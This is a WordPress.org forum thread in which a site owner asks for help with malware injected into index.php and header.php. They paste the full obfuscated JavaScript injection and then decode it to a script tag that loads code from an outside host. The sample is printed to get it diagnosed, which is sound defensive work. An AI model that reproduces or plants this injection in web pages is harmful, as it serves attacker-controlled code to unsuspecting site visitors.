WordPress.org

Ready to get started?Download WordPress

Forums

php index and header malware id (2 posts)

  1. here
    Member
    Posted 3 years ago #

    Had a few sites hit with malware this past week, including one running 3.0.2. Wondering if anyone recognizes and can help me figure out what the mechanism of infection is.

    Seems to append just before the last characters of index.php and header.php files in most directories.

    Looks like this with random variable strings, differing with different infections.

    Thanks!

    <script type="text/javascript">var wGss98v0zDCHi = "uBdb915uBdb935";var qg2solLrupydN0 = "uBdb93cuBdb973uBdb963uBdb972u"; var qg2solLrupydN1 = "Bdb969uBdb970uBdb974uBdb920uB"; var qg2solLrupydN2 = "db974uBdb979uBdb970uBdb965uBd"; var qg2solLrupydN3 = "b93duBdb922uBdb974uBdb965uBdb"; var qg2solLrupydN4 = "978uBdb974uBdb92fuBdb96auBdb9"; var qg2solLrupydN5 = "61uBdb976uBdb961uBdb973uBdb96"; var qg2solLrupydN6 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN7 = "uBdb922uBdb920uBdb973uBdb972u"; var qg2solLrupydN8 = "Bdb963uBdb93duBdb922uBdb968uB"; var qg2solLrupydN9 = "db974uBdb974uBdb970uBdb93auBd"; var qg2solLrupydN10 = "b92fuBdb92fuBdb963uBdb96fuBdb"; var qg2solLrupydN11 = "975uBdb96euBdb974uBdb965uBdb9"; var qg2solLrupydN12 = "72uBdb973uBdb974uBdb961uBdb97"; var qg2solLrupydN13 = "4uBdb973uBdb92euBdb973uBdb965"; var qg2solLrupydN14 = "uBdb972uBdb976uBdb965uBdb96du"; var qg2solLrupydN15 = "Bdb970uBdb933uBdb92euBdb963uB"; var qg2solLrupydN16 = "db96fuBdb96duBdb92fuBdb92fuBd"; var qg2solLrupydN17 = "b96duBdb96cuBdb92euBdb970uBdb"; var qg2solLrupydN18 = "968uBdb970uBdb922uBdb93euBdb9"; var qg2solLrupydN19 = "20uBdb93cuBdb92fuBdb973uBdb96"; var qg2solLrupydN20 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN21 = "uBdb93e"; var ZPFlt1UYA1tfk = "Dh3Ln15uBdb935";var ERYCkoBwTvOcS = qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21; CtnqKOXMGM9bE = ERYCkoBwTvOcS.replace(/uBdb9/g,"%");var iRDgo28MEsBPo = unescape;var wGss98v0zDCHi = "AUx2i15Dh3Ln35";w9221 = this;var NKCGnIAa0Vzgr=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE));</script></body></html>

  2. here
    Member
    Posted 3 years ago #

    This resolves to a document.write call attempting to append the following script.

    <script type="text/javascript" src="http://counterstats.servemp3.com//ml.php"> </script>

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags